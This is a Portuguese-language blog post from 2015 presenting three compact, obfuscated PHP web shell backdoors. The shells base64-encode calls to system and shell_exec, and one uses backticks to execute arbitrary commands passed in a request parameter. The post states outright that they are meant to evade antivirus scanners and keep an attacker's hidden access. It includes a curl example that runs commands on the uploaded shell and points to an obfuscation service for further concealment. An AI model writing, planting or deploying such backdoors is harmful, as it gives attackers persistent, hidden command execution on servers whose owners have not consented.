sábado, 21 de março de 2015

INURL - BRASIL / Simple Shell Backdoor

Maneiras simples de acesso escondido.

No desenvolvimento de software, a ofuscação é o ato deliberado de criação de código ofuscado, ou seja, de origem ou código de máquina que é difícil para o ser humano de entender. Como ofuscação em linguagem natural, pode usar expressões desnecessariamente rotunda para compor declarações.  Os programadores podem deliberadamente ofuscar código para esconder a sua finalidade (segurança pela obscuridade) ou a sua lógica, a fim de evitar a violação, impedir a engenharia reversa, ou como um quebra-cabeça ou desafio de lazer para alguém que lê o código fonte.  Programas conhecidos como obfuscators transformar código legível em código ofuscado usando várias técnicas.


Script php shell de exploração utilizando function nativos do PHP e tentando melhorar a dinâmica e forma de uso do script.
Para executar comandos em um servidor em sua SHELL podemos usar as seguintes functions nativas:

  1. shell_exec -  Executa um comando via shell e retorna a saída inteira como uma string.
  2. system - Executa um programa externo e mostra a saída.
  3. exec - Executa um programa externo.
  4. passthru - Executa um programa externo e mostra a saída crúa. 


Com o grande numero de scanners/aplicações de segurança que tem o objetivo procurar arquivos maliciosas em seus servidores, muitos estão optando por usar um script simples para escapar dos famigerados AV's ("nada é 100% juntando isso com ofuscação de código você tem mais invisibilidade ").
Tais scripts tem o objetivo de manter o acesso do atacante, logo abaixo temos 3 modelos de script php que nem um mostra nome de functions nativas php, script pequeno e objetivo.


[+MODEL-01 CODE >>
<?php $__=@base64_decode("c3lzdGVt");echo@$__(isset($_REQUEST[0])?$_REQUEST[0]:NULL);
?>

[+] MODEL-02 CODE >>
<?php
echo(`{$_REQUEST[0]}`);
?>


[+MODEL-03 CODE >>
<?php $_=$_REQUEST[0];@$__=@create_function('$_',base64_decode("ZWNobyhzaGVsbF9leGVjKCRfKSk7"));@$__($_); 
?>
SOURCE SCRIPTShttp://pastebin.com/D07wPKmA

Usando o script depois de upado:
EX: http://localhost/of.php?0={COMMAND_ENCOD_URL}

curl "http://localhost/of.php?0=uname%20-a%20%26%26%20ls%20-la"


Exemplo de RESULTADO:

Usando o script depois de upado:  EX: http://localhost/of.php?0={COMMAND_ENCOD_URL}  curl "http://localhost/of.php?0=uname%20-a%20%26%26%20ls%20-la"   Exemplo de RESULTADO:
OBS: Os 3 script exemplos foram anexados a um arquivo par gerar tal output.

OFUSCANDO SEU CÓDIGO:
No desenvolvimento de software, a ofuscação é o ato deliberado de criação de código ofuscado, ou seja, de origem ou código de máquina que é difícil para o ser humano de entender. Como ofuscação em linguagem natural, pode usar expressões desnecessariamente rotunda para compor declarações.

Os programadores podem deliberadamente ofuscar código para esconder a sua finalidade (segurança pela obscuridade) ou a sua lógica, a fim de evitar a violação, impedir a engenharia reversa, ou como um quebra-cabeça ou desafio de lazer para alguém que lê o código fonte.

Programas conhecidos como obfuscators transformar código legível em código ofuscado usando várias técnicas.
Serviço online FOPO:
FOPO creates equivalent PHP obfuscated code which requires no special server runtime for execution. It's not one-way encryption but it will keep curious eyes away from your code. Submitted code gets deleted immediately after obfuscation and is not stored in any way. If you have any comments or suggestions feel free to reach me at fopo@dynsur.com.  Note: In case you've lost the original source code and you are the proven owner of it, a one-way encrypted copy is saved within the obfuscated output and I'll kindly assist you in recovering it.
Obfuscator: http://fopo.com.ar/



# REF:
# http://php.net/manual/en/language.operators.execution.php#language.operators.execution
# https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell
# http://www.businessinfo.co.uk/labs/talk/Nonalpha.pdf
http://php.net/manual/pt_BR/book.exec.php
http://curl.haxx.se/docs/httpscripting.html
http://pastebin.com/D07wPKmA
http://fopo.com.ar/
http://en.wikipedia.org/wiki/Obfuscation_%28software%29

Nenhum comentário:

Postar um comentário

............